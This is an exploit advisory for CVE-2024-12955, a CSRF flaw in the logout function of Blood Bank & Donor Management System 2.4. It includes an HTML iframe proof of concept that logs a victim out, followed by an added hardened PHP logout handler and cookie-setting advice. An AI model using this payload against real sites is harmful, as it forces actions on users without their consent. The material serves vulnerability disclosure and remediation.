# Exploit Title: Blood Bank & Donor Management System 2.4 - CSRF Improper Input Validation
# Google Dork: N/A
# Date: 2024-12-26
# Exploit Author: Kwangyun Keum
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/blood-bank-donor-management-system/
# Version: 2.4
# Tested on: Windows 10 / Kali Linux with Apache and MySQL
# CVE: CVE-2024-12955
## Description:
Blood Bank & Donor Management System v2.4 suffers from a Cross-Site Request
Forgery (CSRF) vulnerability due to the absence of CSRF tokens for critical
functionalities such as logout. An attacker can craft a malicious iframe
embedding the logout URL and trick a victim into clicking it. This results
in the victim being logged out without their consent.
## Steps to Reproduce:
1. Deploy Blood Bank & Donor Management System v2.4.
2. Log in as any user.
3. Use the following PoC to demonstrate the issue:
```html
<html>
<body>
<iframe
src="http://localhost/bbdms/logout.php"
style="border:0px #FFFFFF none;"
name="myLogoutFrame"
scrolling="no"
frameborder="1"
marginheight="0px"
marginwidth="0px"
height="400px"
width="600px"
allowfullscreen>
</iframe>
</body>
</html>
```
4. Save the above HTML code as logout_poc.html.
5. Open the file in a browser and click anywhere on the page to trigger the logout.
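The root cause described above is that `logout.php` acts on a plain GET with no proof that the request came from the application's own page, so any cross-origin `<iframe>` or `<img>` pointing at it logs the victim out. The following is an added example of a hardened logout handler; it is not PHPGurukul's code and not part of the advisory. The file name `logout.php`, the form field name `csrf_token`, the session key `csrf_token` and the redirect target `index.php` are assumptions chosen for illustration.

```php
<?php
// Added example (not from the advisory or PHPGurukul's code base): a logout
// handler that only acts on a POST carrying a per-session CSRF token.
// Field and file names are assumptions made for this illustration.
session_start();

// Issue one random token per session. In a real application regenerate it
// (and the session id) on login.
if (empty($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}

/**
 * Compare the submitted token with the one stored in the session.
 * hash_equals() is constant-time, so the comparison leaks no timing
 * information about how many leading bytes matched.
 */
function csrf_token_valid(array $post, array $session): bool
{
    if (!isset($post['csrf_token'], $session['csrf_token'])) {
        return false;
    }
    return hash_equals($session['csrf_token'], (string) $post['csrf_token']);
}

// A GET from <iframe src="...logout.php"> or <img src="..."> is refused here:
// browsers cannot make an iframe or image issue a POST.
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    header('Allow: POST');
    exit('Logout requires a POST request.');
}

// A cross-site form can POST, but it cannot read the victim's token, so the
// check below rejects it.
if (!csrf_token_valid($_POST, $_SESSION)) {
    http_response_code(403);
    exit('Invalid or missing CSRF token.');
}

// Token verified: destroy the session server-side and expire the cookie.
$_SESSION = [];
if (ini_get('session.use_cookies')) {
    $p = session_get_cookie_params();
    setcookie(session_name(), '', time() - 42000,
        $p['path'], $p['domain'], $p['secure'], $p['httponly']);
}
session_destroy();
header('Location: index.php');
exit;
```

The matching UI change is to replace the logout hyperlink with a small form, for example `<form method="post" action="logout.php"><input type="hidden" name="csrf_token" value="<?= htmlspecialchars($_SESSION['csrf_token']) ?>"><button type="submit">Logout</button></form>`, so that only a page rendered by the application can supply the token. Setting the session cookie with `SameSite=Lax` (via `session_set_cookie_params()` before `session_start()`) adds a second layer: the browser then withholds the session cookie from cross-site POSTs and embedded iframes, which is why the iframe PoC above stops working even before the token check runs.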